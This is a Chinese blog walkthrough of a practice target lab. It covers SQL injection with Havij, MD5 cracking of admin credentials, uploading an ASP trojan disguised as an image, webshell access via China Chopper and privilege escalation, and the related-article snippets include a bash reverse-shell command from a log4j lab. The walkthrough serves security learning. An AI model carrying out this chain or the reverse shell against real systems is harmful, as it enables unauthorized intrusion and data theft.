摄影工作室靶场

2024-04-13 09:32
文章标签 靶场 摄影 工作室

本文主要是介绍摄影工作室靶场,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1.输入目标IP,
2.拿到一个网页后,首先要做的第一步就是ping一下,看此网站能否ping通(ping通说明此防火墙未开启,反之则开启)
在这里插入图片描述
3.接下来常规操作,开始扫描端口信息和爆破目录。

在这里插入图片描述在这里插入图片描述发现以上端口是开放的,可以都访问一遍,发现其实没有什么用处,继续爆破目录。

在这里插入图片描述可以访问爆破出来的目录,发现其实都是一些常规的网页,继续进行信息收集。
4.在原界面输入robots.txt,发现也没有收获。
在这里插入图片描述
5. 发现这里存在SQL语句报错,存在SQL注入漏洞,接下来利用工具进行报表、暴库、爆字段。
在这里插入图片描述
6.在这里我用的是Havij这款软件,接下来是爆破流程。
在这里插入图片描述
(1)第一步首先输入目标IP地址,接下来开始进行爆破。
在这里插入图片描述在这里插入图片描述

(2)所有的表格已经爆破出来,接下来开始爆破字段。

在这里插入图片描述
(3)开始进行爆破数据。
在这里插入图片描述这个时候发现已经得到用户名还有密码,但是要进行md5解密,

在这里插入图片描述得到用户密码可以进行登录。
7.接下来寻找登录后台界面。
在这里插入图片描述发现可以访问。输入爆破出来的用户名密码。
在这里插入图片描述8.寻找能够上传的位置。(在这里我直接把asp木马改成jpg图片形式上传)
在这里插入图片描述上传成功。但不知道上传到哪里去,所以找一下上传后图片的路径。
在这里插入图片描述
查看
在这里插入图片描述
说明已经上传成功。
9.这个时候发现有数据库备份功能,可以进行备份。
在这里插入图片描述
10.备份成功(访问备份后的)
在这里插入图片描述
11.连接菜刀
在这里插入图片描述12.发现还是权限不太够,可以上传大马
在这里插入图片描述
访问大马后发现权限不够,上传cmd.exe。漏洞利用的pe.exe
在这里插入图片描述
最后远程连接

在这里插入图片描述连接后输入创建的用户名还有密码就可以访问服务器端,结束。

这篇关于摄影工作室靶场的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/899768

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

一个瑞典游戏工作室决定离开索尼,之前和之后都发生了什么?

我们在前两篇中探究了国家政策、硬件基础与黑客文化如何让瑞典成为了游戏热土,而它充满地域特色的开发者社区与教育体系的构建,又是如何聚拢了游戏人才,让体系持续生长扩张。 除了大学、科技园和开发者之家外,我们此行从斯德哥尔摩到舍夫德到马尔默,还采访了三家知名工作室的创始人。它们一家产出如今罕见的双人合作游戏,还有一位特立独行的作者型开发者屡屡占据头条;一家贡献了现象级网红作品,当前在朝“正经向”大

django摄影竞赛小程序论文源码调试讲解

2系统关键技术及工具简介 系统开发过程中设计的关键技术是系统的核心,而开发工具则会影响的项目开发的进程和效率。第二部分便描述了系统的设计与实现等相关开发工具。 2.1 Python简介 Python 属于一个高层次的脚本语言,以解释性,编译性,互动性和面向对象相结合。在设计上相比其他语言,它更具有特色语法结构,很强的可读性。 2.2 Django框架 Django是一个开放源

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第